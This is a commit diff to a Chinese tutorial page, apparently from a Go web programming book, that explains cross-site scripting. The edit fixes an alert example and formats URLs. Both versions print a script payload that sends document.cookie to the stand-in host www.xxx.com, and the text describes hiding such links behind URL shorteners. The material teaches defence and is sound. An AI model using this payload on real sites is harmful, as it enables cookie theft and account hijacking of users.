修改了一些错误信息

9.3.md

@@ -21,7 +21,7 @@ Web应用未对用户提交请求的数据做充分的检查过滤，允许用
 
 	hello astaxie
 
-如果我们传递这样的url："http://127.0.0.1/?name=alert(&#39;astaxie,xss&#39;)",这时你就会发现浏览器跳出一个弹出框，这说明站点已经存在了XSS漏洞。那么恶意用户是如何盗取Cookie的呢？与上类似，如下这样的url："http://127.0.0.1/?name=<script>document.location='http://www.xxx.com/cookie?'%20+document.cookie</script>"，这样就可以把当前的cookie发送到指定的站点：www.xxx.com。你也放会说，这样的URL一看就有问题，怎么会有人点击？，是的，这类的URL会让人怀疑，但如果使用短网址服务将之缩短，你还看得出来么？，攻击者将缩短过后的url通过某些途径传播开来，被攻击用户一旦点击了这样的url，相应cookie数据就会被发送事先设定好的站点，这样就盗得了cookie信息，然后就可以利用Websleuth之类的工具来检查是否能盗取那个可怜的用户的账户信息了。
+如果我们传递这样的url：`http://127.0.0.1/?name=<script>alert(&#39;astaxie,xss&#39;)</script>`,这时你就会发现浏览器跳出一个弹出框，这说明站点已经存在了XSS漏洞。那么恶意用户是如何盗取Cookie的呢？与上类似，如下这样的url：`http://127.0.0.1/?name=<script>document.location='http://www.xxx.com/cookie?'%20+document.cookie</script>`，这样就可以把当前的cookie发送到指定的站点：www.xxx.com。你也放会说，这样的URL一看就有问题，怎么会有人点击？，是的，这类的URL会让人怀疑，但如果使用短网址服务将之缩短，你还看得出来么？，攻击者将缩短过后的url通过某些途径传播开来，被攻击用户一旦点击了这样的url，相应cookie数据就会被发送事先设定好的站点，这样就盗得了cookie信息，然后就可以利用Websleuth之类的工具来检查是否能盗取那个可怜的用户的账户信息了。
 
 更加详细的关于XSS的分析大家可以参考这篇叫做《新浪微博XSS事件分析》的文章（http://www.rising.com.cn/newsletter/news/2011-08-18/9621.html）